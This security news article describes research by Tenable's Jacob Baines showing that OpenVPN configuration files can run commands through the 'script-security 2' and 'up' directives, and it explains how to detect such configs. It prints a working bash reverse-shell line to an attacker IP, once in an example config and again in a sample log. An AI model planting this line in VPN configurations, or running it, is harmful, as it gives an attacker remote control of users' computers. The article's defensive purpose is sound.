Call me a cynic, but one thing I have learned from the using the Internet is to double-check, if not triple-check, everything you download. So many downloads have malware, adware, and scripts that perform malicious activities on your computer that it has to be a requirement to thoroughly check a download before it's used.
This point is shown in research posted by Tenable reverse engineer Jacob Baines, where he shows how a normally harmless VPN configuration file can be used to open a backdoor on a computer that uses it.
In his article, Baines explains how a simple OpenVPN configuration file can be used to execute commands on a computer after a VPN connection is made. This could also attackers to distribute OpenVPN configuration files that automatically execute commands to open backdoors through a reverse shell or perform other unwanted behavior on the computer.
OpenVPN is a popular open-source VPN program that allows you to create secure and encrypted network connection between your computer or device and another network. Due to its popularity, it has been ported to work on a variety of devices, including routers that run DD-WRT. To facilitate this, VPN providers create OpenVPN profiles that can be downloaded and installed in order to easily configure a VPN connection.
According to Baines, to do this all a bad actor would need to do is to add a few lines to a harmless OpenVPN configuration file (.opvpn) to make it malicious. In Baines' example, a OpenVPN configuration file is simply a text file with some commands in it:
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun
If an actor wanted to cause the OpenVPN configuration file to execute a command they would add the "script-security 2" line, which allows user defined scripts to be executed, and a "up" entry, which contains the command that is executed after after a connection has been made. As an example, he changed the above configuration file so that it executes a command as shown below.
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun script-security 2 up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”
When this configuration file is used and after a connection has been established, OpenVPN will execute the above command to open a reverse shell to the computer at 192.168.1.218. This would allow the attacker at that IP address to execute commands on the remote computer that ran the OpenVPN configuration file.
Baines even goes on to show how the above method could be ported to attack Windows users by using a PowerShell script instead.
While this shows you should be careful about downloading OpenVPN configs from third-parties, Baines told BleepingComputer that he has not found any malicious configs currently in the wild.
Now that you know that OpenVPN configuration could be used against you, you may be wondering how to check if any that you use are malicious.
In his article, Baines states that you can find clues in a VPN connection log as shown below.
Thu Jun 7 12:28:23 2018 NOTE: the current — script-security setting may allow this configuration to call user-defined scripts Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init
If you see the above lines in your log, it means the "script-security 2" setting was used, which allows user defined scripts to be executed. As that line is required to run scripts, it would follow that something is being executed by the configuration file. You should be able to spot the command being executed as shown by the second line in the log above.
As OpenVPN configuration files are simply text files, you can also check if an OpenVPN configuration is malicious by opening the file up in Notepad or another text editor. This will allow you to see the entire configuration file and spot if any commands are being executed.
Unfortunately, OpenVPN has other configuration directives that can execute commands as well and Baines recommends users use the Viscosity OpenVPN instead, which can filter out these types of commands.
"Unfortunately, the up command is not the only command that can be used in this way," Baines told BleepingComputer. "Up, down, client-connect, learn-address, auth-user-pass-verify, and learn-address all execute configuration specified commands (although some of these are server specific). A lay person might try to review and understand the configuration file. However, I think its safer to use a client like viscosity that simply filters out this behavior."